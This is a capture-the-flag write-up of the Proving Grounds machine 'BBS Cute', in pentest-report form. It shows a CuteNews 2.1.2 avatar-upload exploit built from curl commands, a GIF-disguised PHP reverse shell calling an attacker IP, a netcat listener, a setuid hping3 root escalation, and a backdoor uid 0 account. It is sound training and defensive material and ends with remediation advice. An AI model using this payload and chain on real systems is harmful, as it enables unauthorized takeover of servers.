PG Play: BBS Cute
Quick Links
BBS Cute#
A 5-point machine on Proving Grounds Play.
Executive Summary#
The target machine was running an out-of-date version of a web forum software which contained a local file inclusion vulnerability allowing arbitrary php code execution via an authenticated file upload mechanism. Further, the machine included a network test tool that was configured in a way that allowed low privileged users to run arbitrary commands as root.
Methodology#
I enumerated the machine using nmap and gobuster, located the vulnerable web app and potential exploits with exploitdb, exploited the vulnerable web app using the provided proof-of-concept, then enumerated the user environment with builtin tools, located the network test tool, and finally exploited it via the method discribed on gtfobins.
Information Gathering#
I used nmap -p- --open 192.168.188.128 to discover open ports, finding 5 open ports. 22, 80, 88, 110, and 995 were open. I fingerprinted each port to determine the software responding on each:
22/tcp open ssh
80/tcp open http
88/tcp open kerberos-sec
110/tcp open pop3
995/tcp open pop3s
After determining that the web server on port 80 was the best starting point, I initially visited the website in firefox and determined it is running the default web-server content from a debian installation. Understanding this was static content without likely vulnerabilities I used gobuster to confirm if any other content was found on the web server.
Gobuster indicated that there were several files of interest:
/.htaccess (Status: 403) [Size: 280]
/.hta (Status: 403) [Size: 280]
/.htpasswd (Status: 403) [Size: 280]
/core (Status: 301) [Size: 317] [--> http://192.168.188.128/core/]
/docs (Status: 301) [Size: 317] [--> http://192.168.188.128/docs/]
/favicon.ico (Status: 200) [Size: 1150]
/index.html (Status: 200) [Size: 10701]
/index.php (Status: 200) [Size: 6175]
/libs (Status: 301) [Size: 317] [--> http://192.168.188.128/libs/]
/manual (Status: 301) [Size: 319] [--> http://192.168.188.128/manual/]
/server-status (Status: 403) [Size: 280]
/skins (Status: 301) [Size: 318] [--> http://192.168.188.128/skins/]
/uploads (Status: 301) [Size: 320] [--> http://192.168.188.128/uploads/]
After visiting each in turn, I determined that a web forum software, cutenews, was installed. The version number 2.1.2 was reported by the software when requesting index.php.
I returned to the overall list of open ports and attempted to ID any other services that may be vulnerable. Finding nothing more relevent, I continued to focus on the web server and forum application.
Vulnerability Assessment#
I located several vulnerabilities that apply to this version of cutenews.
CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit) | php/remote/46698.rb
CuteNews 2.1.2 - Arbitrary File Deletion | php/webapps/48447.txt
CuteNews 2.1.2 - Authenticated Arbitrary File Upload | php/webapps/48458.txt
CuteNews 2.1.2 - Remote Code Execution | php/webapps/48800.py
Starting with the first listed vulnerability I found that a remote code execution can be attained using an authenticated file upload that leads to a local file inclusion vulnerability.
Of note, one of the other vulnerabilities refers to the same issue, but I focused on the first one. This was a mistake as it was cumbersome to use since I wanted to convert it to avoid metasploit and I ended up spending more time than needed converting the logic into curl commands.
Exploitation#
I place a payload that starts with the GIF header to avoid detection. (This is “GIF/r/n” then the php reverse shell)
GIF
<?php $s = fsockopen('192.168.45.158', 4444); proc_open('/bin/bash', [0=>$s,1=>$s,2=>$s], $p);?>
Then, taking the cookie contents from an authorized new-user account I had made using the web interface, along with the key tokens included in the dashboard page,
curl -X POST 'http://192.168.188.128/index.php' -F "mod=main" -F "opt=personal" -F "__signature_key=51802df4cfedd641a779c2cfad024046-bob" -F "__signature_dsi=133761aa31ec3234a8e935320f52ea25" -F "editpassword=" -F "confirmpassword=" -F "editnickname=bob" -F "avatar_file=@./innocent.php;type=image/png" -F "more[site]=" -F "more[about]=" --compressed -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://192.168.188.128/index.php?mod=main' -H 'Cookie: CUTENEWS_SESSION=710nhebjac6vtep3uph7gc6e8l' -H 'Upgrade-Insecure-Requests: 1' -H 'Priority: u=0, i'
curl 'http://192.168.188.128/uploads/avatar_bob_innocent.php' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0' -H 'Accept: image/avif,image/webp,image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://192.168.188.128/' -H 'Priority: u=5, i'
This sequence causes the user I created to have an avatar image uploaded that is a valid php file as well as passing the tests for a “valid” image file. Then, I request this file which causes it to be interpreted by the server and initiates a reverse-shell connection I were listening for.
sudo nc -lvnp 4444
Post Exploitation#
After gaining initial access I poked around looking for typical misconfigurations. One that came to the surface quickly was a binary with setuid set:
find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/mount
/usr/sbin/hping3
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
Specifically I are looking at hping3 here, which is listed in gtfobins as vulnerable when configured with setuid, which it is in this case.
The vulnerable command allows elevated privileges to be used for arbitrary commands, so I can create a root shell immediately by starting the command and running /bin/sh -p. This returns a root shell with which I are able to create an additional uid 0 user with known password.
At this point I can log in using the ssh service to the created user with uid 0 and known password, providing some persistance and a fully featured shell with root access.
Risk Analysis#
This attack was trivial, and presents a critical risk that the machine can be completely controled by any unauthenticated parties with the ability to send packets to it on port 80, and receive packets back from it on any port.
The attack required the creation of a valid user account, but this is permitted without authentication or verification in the current configuration.
Recommendations#
I recommend the removal of the network test tool hping3 or if this is not feasible, it should be moved into a secure location inaccessible to ordinary users. A potential solution could be to remove the setuid bit from it and instead configure it so that authorized users can sudo that specific command only.
I recommend upgrading the forum software to a non-vulnerable version, and requiring verification of users for approval instead of open-registration. Additionally, it appeared that the www user may have had write access to folders which were not necessary to the function of that account. This should be reviewed.